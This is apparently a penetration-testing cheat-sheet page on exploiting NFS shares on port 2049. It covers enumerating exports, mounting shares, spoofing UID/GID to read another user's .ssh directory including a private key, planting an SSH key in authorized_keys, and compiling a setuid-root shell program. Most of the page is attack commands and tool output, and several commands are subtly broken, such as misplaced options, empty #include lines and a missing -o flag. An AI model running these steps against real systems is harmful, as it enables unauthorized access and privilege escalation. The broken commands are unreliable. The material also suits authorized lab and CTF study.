2049 - NFS
NFS security is partially based on the remote user mounting the filesystem having the same UID (User ID) and GID (Group ID) as the owner of that share.
We can find a NFS share if we query port 111 (RPC)
NFS security is partially based on the remote user mounting the filesystem having the same UID (User ID) and GID (Group ID) as the owner of that share. Restrictions can also be placed into the /etc/hosts.allow and /etc/hosts.deny files, but we won’t go into that here. Suffice to say, using the UID and GID as a basis for security isn’t the best way of doing it.
Show shares:
showmount -e {IP Address}
Mount a share:
Don't forget to create the share you mounting to (/mnt/nfs)...
mount {IP Address}:/vol/share /mnt/nfs -nolock nfsserver=3
Example:
root@kali:~# mount -t nfs 192.168.0.42:/var/nfs /mnt/test1 -o nolock
*Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
Using username and password:
mount -t cifs -o ro,domain=[domain],username=[username],password=[password],sec=ntlmv2 //hostnameOrIP/Share /path/to/localdir
Example:
mount -t cifs nfsserver=3 -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
Unmount
root@kali:~# umount -f -l /mnt/test1
UID/GID Manipulation
Can use nfsshell or use bash
Add new user with the following commands:
groupadd --gid 1005 peter
adduser peter --uid 101 --gid 1005
Now we can create ssh keys (ssh-keygen) and able copy the ssh key to the nfs share:
cat ~/.ssh/id_rsa.pub >> /mnt/peter/.ssh/authorized_keys
Nfsshell
Link: https://github.com/NetDirect/nfsshell or nfsshell
Nfsshell is useful for accessing NFS shares without having to create users with the same UID/GID pair as the target exported filesystem
Example:
root@kali:/opt/nfsshell# ./nfsshell
nfs> host 192.168.0.45
Using a privileged port (1021)
Open 192.168.0.45 (192.168.0.45) TCP
nfs> export
Export list for 192.168.0.45:
/home/karl *
nfs> mount /home/karl
Using a privileged port (1020)
Mount `/home/karl', TCP, transfer size 65536 bytes.
nfs> ls -l
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 ..
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .bash_history
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .bash_logout
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .bashrc
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .lesshst
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .profile
drwxr-xr-x 3 1001 1001 4096 Mar 5 2019 .ssh
nfs> cd .ssh
nfs> ls
Readdir failed: Permission denied
nfs> uid 1001
nfs> gid 1001
nfs> ls
.
..
authorized_keys
id_rsa
id_rsa.pub
user.txt
nfs>
Shell
We can obtain a shell via running the following code:
cat << EOF >> shell.c
> #include
> #include
> #include
> #include
> int main()
> {
> setuid(0);
> system("/bin/bash");
> return 0;
> }
> EOF
gcc shell.c shell
./shell
Last updated
Was this helpful?